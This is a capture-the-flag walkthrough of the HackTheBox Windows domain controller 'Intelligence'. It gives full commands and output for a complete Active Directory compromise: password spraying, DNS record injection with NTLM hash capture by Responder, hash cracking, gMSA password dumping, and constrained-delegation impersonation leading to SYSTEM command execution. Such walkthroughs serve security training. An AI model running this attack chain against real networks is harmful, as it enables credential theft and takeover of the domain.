Intelligence - [HTB]

Cover Image for Intelligence - [HTB]
Marmeus
Marmeus

Table of Contents

    Introduction

    Intelligence is a Windows Active Directory machine from HackTheBox where the attacker will have to enumerate public files in order to find some users and the credentials for obtaining the user flag. Then, will have to add a fake DNS into the domain DNS for obtaining Ted's creds. Finally, the attacker will have to obtain a GSMA password allowing it to impersonate the Admin Domain obtaining the root flag.

    Enumeration

    As always, let's start finding all opened ports in the machine with nmap.

    kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.248
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 17:21 EDT
    Nmap scan report for 10.10.10.248
    Host is up (0.041s latency).
    Not shown: 65514 filtered ports
    PORT      STATE SERVICE
    53/tcp    open  domain
    80/tcp    open  http
    88/tcp    open  kerberos-sec
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    389/tcp   open  ldap
    445/tcp   open  microsoft-ds
    464/tcp   open  kpasswd5
    593/tcp   open  http-rpc-epmap
    636/tcp   open  ldapssl
    3268/tcp  open  globalcatLDAP
    3269/tcp  open  globalcatLDAPssl
    5985/tcp  open  wsman
    9389/tcp  open  adws
    49667/tcp open  unknown
    49691/tcp open  unknown
    49692/tcp open  unknown
    49702/tcp open  unknown
    49714/tcp open  unknown
    55797/tcp open  unknown
    57669/tcp open  unknown
    
    Nmap done: 1 IP address (1 host up) scanned in 56.13 seconds

    Then, we continue with a deeper scan of every opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49685,49686,49704,49708 -T5 -Pn -oN PortsDepth.txt 10.10.10.248
    Nmap scan report for 10.10.10.248
    Host is up (0.044s latency).
    
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Simple DNS Plus
    80/tcp    open  http          Microsoft IIS httpd 10.0
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: Intelligence
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-08 04:05:09Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
    3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
    | ssl-cert: Subject: commonName=dc.intelligence.htb
    | Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
    | Not valid before: 2021-04-19T00:43:16
    |_Not valid after:  2022-04-19T00:43:16
    |_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
    5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    9389/tcp  open  mc-nmf        .NET Message Framing
    49667/tcp open  msrpc         Microsoft Windows RPC
    49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    49686/tcp open  msrpc         Microsoft Windows RPC
    49704/tcp open  msrpc         Microsoft Windows RPC
    49708/tcp open  msrpc         Microsoft Windows RPC
    Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Host script results:
    |_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2021-07-08T04:05:59
    |_  start_date: N/A
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Wed Jul  7 17:06:37 2021 -- 1 IP address (1 host up) scanned in 96.96 seconds

    Looking at the web page there are some documents that we can download.

    Intelligence web page

    Both of theme have usernames stored in the metadata fields. However, we can not do much with them.

    kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator
    Creator                         : William.Lee
    Creator                         : Jose.Williams

    Nonetheless, under the documents directory seems to be are more files, following the same syntax but changing the date.

    In order to download them all, I created the following script.

    import requests
    import os
    
    URL_BASE="http://10.10.10.248/documents/2020-{:02d}-{:02d}-upload.pdf"
    
    for i in range(1,13):
        for j in range(1,32):
            URL_FINAL=URL_BASE.format(i,j)
            print URL_FINAL
            status=requests.get(URL_FINAL).status_code
            if status==200:
                os.system("wget "+URL_FINAL)

    You only need to execute the following commands in order to obtain a list with all the users.

    kali@kali:~/Documents/HTB/Intelligence$ python obtainPDFs.py
    kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator | awk '{print $3}' | sort -u > users.txt

    Furthermore, inside the document 2020-06-04-upload.pdf there is the following text.

    New Account Guide
    Welcome to Intelligence Corp!
    Please login using your username and the default password of:
    NewIntelligenceCorpUser9876
    After logging in please change your password as soon as possible.

    Exploitation

    We can find out which user the password belongs to thanks to crackmapexec.

    kali@kali:~/Documents/HTB/Intelligence$ crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876 
    SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 

    Now we can access to all shared folders.

    kali@kali:~/Documents/HTB/Intelligence$ smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248
    [+] IP: 10.10.10.248:445        Name: intelligence.htb                                  
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            C$                                                      NO ACCESS       Default share
            IPC$                                                    READ ONLY       Remote IPC
            IT                                                      READ ONLY
            NETLOGON                                                READ ONLY       Logon server share 
            SYSVOL                                                  READ ONLY       Logon server share 
            Users                                                   READ ONLY
    

    Under the Users share we can retrieve the user flag.

    kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/Users
    smb: \Tiffany.Molina\Desktop\> dir
      .                                  DR        0  Sun Apr 18 20:51:46 2021
      ..                                 DR        0  Sun Apr 18 20:51:46 2021
      user.txt                           AR       34  Wed Jul 21 12:50:12 2021

    Privilege escalation 1

    Under the share IT we can retrieve a powershell script.

    kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/IT
    smb: \> dir
      .                                   D        0  Sun Apr 18 20:50:55 2021
      ..                                  D        0  Sun Apr 18 20:50:55 2021
      downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021
    
                    3770367 blocks of size 4096. 1460519 blocks available
    smb: \> get downdetector.ps1 
    getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)

    The script execute an Active Directory query in order to obtain all DNS domains under the Active Directory domain. Then, tries to access them sending the user credentials.

    # Check web server status. Scheduled to run every 5min
    Import-Module ActiveDirectory 
    foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
    	try {
    		$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
    		if(.StatusCode -ne 200) {
    			Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
    		}
    	} catch {}
    }

    Hence, we can add a our own domain in order to retrieve the user credentials with responder.

    In order to add a domain we need to synchronise the kali's clock with the server's clock and execute dnstool.py.

    kali@kali:~/Documents/HTB/Intelligence$ sudo ntpdate 10.10.10.248 
    kali@kali:~/Documents/HTB/Intelligence$ python3 dnstool.py -u "intelligence\Tiffany.Molina" -p NewIntelligenceCorpUser9876 -a add -t A -r webMarmeus.intelligence.htb -d 10.10.14.245 10.10.10.248
    [-] Connecting to host...
    [-] Binding to host
    [+] Bind OK
    /media/sf_2_MisPostsBlog/HTB/Intelligence/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
      res = dnsresolver.query(zone, 'SOA')
    [-] Adding new record
    [+] LDAP operation completed successfully

    Then, we need to execute responder waiting up to 10 minutes in order to retrieve the credential.

    kali@kali:~/Documents/HTB/Intelligence$ sudo responder -I tun0 -A 
    [+] Listening for events...
    
    [HTTP] NTLMv2 Client   : 10.10.10.248
    [HTTP] NTLMv2 Username : intelligence\Ted.Graves
    [HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:9751b32b8379208d:4D13215C35DA7AB5751CC22BF9055653:01010000000000001E8542EDC67ED701F92F22BD457D234700000000020008004C0047005900480001001E00570049004E002D0056003800330031005400480050004800510056003100040014004C004700590048002E004C004F00430041004C0003003400570049004E002D00560038003300310054004800500048005100560031002E004C004700590048002E004C004F00430041004C00050014004C004700590048002E004C004F00430041004C00080030003000000000000000000000000020000000865082CE41604DB9E1765B44E059B2CECE9C0D8C3C18D96009F717D40156250A001000000000000000000000000000000000000900400048005400540050002F007700650062006D00610072006D006500750073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

    With hashcat we can retrieve the actual NTLM password.

    kali@kali:~/Documents/HTB/Intelligence$ hashcat -m 5600 tedHash.txt /usr/share/wordlists/rockyou.txt
    [...]
    TED.GRAVES::intelligence:9751b32b8379208d:4d13215c35da7ab5751cc22bf9055653:01010000000000001e8542edc67ed701f92f22bd457d234700000000020008004c0047005900480001001e00570049004e002d0056003800330031005400480050004800510056003100040014004c004700590048002e004c004f00430041004c0003003400570049004e002d00560038003300310054004800500048005100560031002e004c004700590048002e004c004f00430041004c00050014004c004700590048002e004c004f00430041004c00080030003000000000000000000000000020000000865082ce41604db9e1765b44e059b2cece9c0d8c3c18d96009f717d40156250a001000000000000000000000000000000000000900400048005400540050002f007700650062006d00610072006d006500750073002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy
    

    Privilege escalation 2

    After trying a lot of stuff, we can retrieve a GMSA password with Ted's credentials.

    kali@kali:~/Documents/HTB/Intelligence$ git clone https://github.com/micahvandeusen/gMSADumper.git
    kali@kali:~/Documents/HTB/Intelligence/gMSADumper$ python3 ./gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
    Users or groups who can read password for svc_int$:
     > DC$
     > itsupport
    svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7
    

    The service svc_init has the primitive msDS-AllowedToDelegateTo which could allow us to impersonate Domain Admins.

    kali@kali:~/Documents/HTB/Intelligence$ sudo ldapsearch -x -h 10.10.10.248 -D "intelligence\TED.GRAVES" -w "Mr.Teddy" -b "CN=svc_int,CN=Managed ServiceDC=intelligence,DC=htb" 
    [...]
    msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb
    [...]

    In order to impersonate the service as Administrator we need synchronise the clocks once more and execute getST.py.

    kali@kali:~/Documents/HTB/Intelligence$ sudo net time set -S 10.10.10.248
    kali@kali:~/Documents/HTB/Intelligence$ getST.py intelligence.htb/svc_int$ -spn www/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [*] Getting TGT for user
    [*] Impersonating administrator
    [*]     Requesting S4U2self
    [*]     Requesting S4U2Proxy
    [*] Saving ticket in administrator.ccache

    Now, we are able to execute any commands as nt authority\system, obtaining the root flag.

    kali@kali:~/Documents/HTB/Intelligence$ export KRB5CCNAME=administrator.ccache
    kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'whoami'
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [!] This will work ONLY on Windows >= Vista
    [*] Creating task \EjMKGuQK
    [*] Running task \EjMKGuQK
    [*] Deleting task \EjMKGuQK
    [*] Attempting to read ADMIN$\Temp\EjMKGuQK.tmp
    nt authority\system
    
    kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [!] This will work ONLY on Windows >= Vista
    [*] Creating task \usqqykxq
    [*] Running task \usqqykxq
    [*] Deleting task \usqqykxq
    [*] Attempting to read ADMIN$\Temp\usqqykxq.tmp
    [CENSORED]